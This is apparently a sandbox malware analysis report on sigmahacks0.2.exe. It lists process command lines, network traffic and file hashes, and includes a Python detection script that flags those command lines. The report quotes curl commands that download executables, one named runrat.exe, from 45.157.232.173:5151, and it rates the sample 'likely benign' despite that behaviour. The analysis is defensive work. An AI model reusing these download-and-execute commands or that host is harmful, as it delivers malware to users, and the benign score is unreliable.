Malware Analysis Report

2025-04-14 03:22

Sample ID 240612-t338lsvhpr
Target sigmahacks0.2.exe
SHA256 3c8d5c2b52242137822451d7ce4ba46e04087a8de82a427a4c1450aa09e85af3
Tags
score
3/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
3/10

SHA256

3c8d5c2b52242137822451d7ce4ba46e04087a8de82a427a4c1450aa09e85af3

Threat Level: Likely benign

The file sigmahacks0.2.exe was found to be: Likely benign (score 3/10). Note that the behavioral1 detonation nonetheless records the sample running a batch file from %TEMP% via cmd /c, which then uses curl to fetch two further executables from 45.157.232.173:5151, one of them saved under the name dllhost.exe; see Processes and Network below.

Malicious Activity Summary

Unsigned PE

Suspicious use of WriteProcessMemory

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2024-06-12 16:35

Signatures

Unsigned PE

Description    Indicator    Process    Target
N/A            N/A          N/A        N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-12 16:35

Reported

2024-06-12 16:37

Platform

win10v2004-20240508-en

Max time kernel

63s

Max time network

50s

Command Line

"C:\Users\Admin\AppData\Local\Temp\sigmahacks0.2.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\sigmahacks0.2.exe

"C:\Users\Admin\AppData\Local\Temp\sigmahacks0.2.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\465F.tmp\4660.tmp\4671.bat C:\Users\Admin\AppData\Local\Temp\sigmahacks0.2.exe"

C:\Windows\system32\curl.exe

curl -s -o dllhost.exe "http://45.157.232.173:5151/downloads/runincognito.exe"

C:\Windows\system32\dllhost.exe

dllhost.exe

C:\Windows\system32\curl.exe

curl -s -o Incognito.exe "http://45.157.232.173:5151/downloads/runrat.exe"
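The process chain listed above (a batch file dropped in %TEMP% and run via cmd /c, which calls curl to fetch two further executables from a raw IP and port, one of them written under the name of a Windows system binary) is the kind of pattern a detection engineer would want to triage automatically rather than by eye. The following Python is an added example, not code from this report or from the sandbox that produced it; it runs the command lines listed above through three simple heuristics and extracts the network and file IOCs. The rule names, the SYSTEM_BINARY_NAMES list and the Finding structure are assumptions of this example, and the command lines are copied from the report as constructed input.

```python
import re
from dataclasses import dataclass

# Process command lines as listed in the behavioral1 section of this report
# (constructed input for the example).
REPORT_CMDLINES = [
    r'"C:\Users\Admin\AppData\Local\Temp\sigmahacks0.2.exe"',
    r'"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\465F.tmp\4660.tmp\4671.bat C:\Users\Admin\AppData\Local\Temp\sigmahacks0.2.exe"',
    r'curl -s -o dllhost.exe "http://45.157.232.173:5151/downloads/runincognito.exe"',
    r'dllhost.exe',
    r'curl -s -o Incognito.exe "http://45.157.232.173:5151/downloads/runrat.exe"',
]

# Assumed list of names belonging to signed Windows binaries in System32; a
# download written under one of these names is a masquerading signal.
SYSTEM_BINARY_NAMES = {"dllhost.exe", "svchost.exe", "csrss.exe", "lsass.exe",
                       "explorer.exe", "conhost.exe", "rundll32.exe"}
EXEC_EXT = (".exe", ".dll", ".bat", ".cmd", ".ps1", ".vbs", ".scr")

TOKEN_RE = re.compile(r'"[^"]*"|\S+')
IPV4_URL_RE = re.compile(r'^https?://(\d{1,3}(?:\.\d{1,3}){3})(?::(\d+))?(/.*)?$', re.I)
TEMP_BAT_RE = re.compile(r'[A-Za-z]:\\\S*\\AppData\\Local\\Temp\\\S*\.bat\b', re.I)


@dataclass(frozen=True)
class Finding:
    rule: str       # hypothetical rule name
    cmdline: str    # the offending command line
    detail: str     # host, dropped name or batch path


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted runs whole."""
    return [t.strip('"') for t in TOKEN_RE.findall(cmdline)]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def curl_output(toks):
    """Return the argument of curl's -o switch, or None."""
    if "-o" in toks:
        i = toks.index("-o")
        if i + 1 < len(toks):
            return toks[i + 1]
    return None


def analyze_cmdline(cmdline):
    toks = tokenize(cmdline)
    if not toks:
        return []
    image = basename(toks[0])
    findings = []
    if image in ("curl", "curl.exe"):
        out = curl_output(toks)
        for url in toks:
            m = IPV4_URL_RE.match(url)
            if not m:
                continue
            host = m.group(1) + (":" + m.group(2) if m.group(2) else "")
            # Executable payload fetched from a literal IPv4 address.
            if (out and out.lower().endswith(EXEC_EXT)) or url.lower().endswith(EXEC_EXT):
                findings.append(Finding("curl_exe_download_from_raw_ip", cmdline,
                                        f"{host} -> {out or '(stdout)'}"))
        # Download saved under the name of a Windows system binary.
        if out and basename(out) in SYSTEM_BINARY_NAMES:
            findings.append(Finding("download_named_as_system_binary", cmdline, basename(out)))
    elif image in ("cmd", "cmd.exe") and any(t.lower() == "/c" for t in toks):
        # cmd /c executing a batch file that lives under the user's Temp folder.
        for t in toks:
            m = TEMP_BAT_RE.search(t)
            if m:
                findings.append(Finding("cmd_runs_batch_from_temp", cmdline, m.group(0)))
                break
    return findings


def analyze_report(cmdlines):
    return [f for c in cmdlines for f in analyze_cmdline(c)]


def extract_iocs(cmdlines):
    """Collect remote hosts, URLs and curl output names from the command lines."""
    hosts, urls, dropped = set(), set(), set()
    for c in cmdlines:
        toks = tokenize(c)
        for t in toks:
            m = IPV4_URL_RE.match(t)
            if m:
                urls.add(t)
                hosts.add(m.group(1) + (":" + m.group(2) if m.group(2) else ""))
        if toks and basename(toks[0]) in ("curl", "curl.exe"):
            out = curl_output(toks)
            if out:
                dropped.add(out)
    return {"hosts": sorted(hosts), "urls": sorted(urls), "dropped": sorted(dropped)}


if __name__ == "__main__":
    for f in analyze_report(REPORT_CMDLINES):
        print(f"[{f.rule}] {f.detail}\n    {f.cmdline}")
    print(extract_iocs(REPORT_CMDLINES))
```

Run against the five command lines from this report, the three rules fire four times in total: once for the batch file under Temp, twice for the first curl line (raw-IP executable download plus the dllhost.exe name) and once for the second curl line; the IOC pass returns the single host 45.157.232.173:5151, both download URLs and the two dropped file names. The same heuristics applied to a curl fetch of a text file from a hostname produce nothing, which is the intended false-positive boundary.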

Network

Country  Destination           Domain  Proto
DE       45.157.232.173:5151   -       tcp
DE       45.157.232.173:5151   -       tcp

Files

C:\Users\Admin\AppData\Local\Temp\465F.tmp\4660.tmp\4671.bat

MD5 aa6cd2e5eea38082199a03f164836f90
SHA1 93f21ab96c7f4b66e3d6d221414bbd7f82b3a293
SHA256 035ddce5103edf606392d566ab937bd060c1e6510eb5ffd7ffa1fc8c71f5853a
SHA512 dde5c9196df1246b5bbd69a7926fe8aa514c82daa01ead3eca1e5b1fdeb2c86678881cfabf8bf78a501be366a272c6aac92849a77d58e5db2bd6cda511a6cc06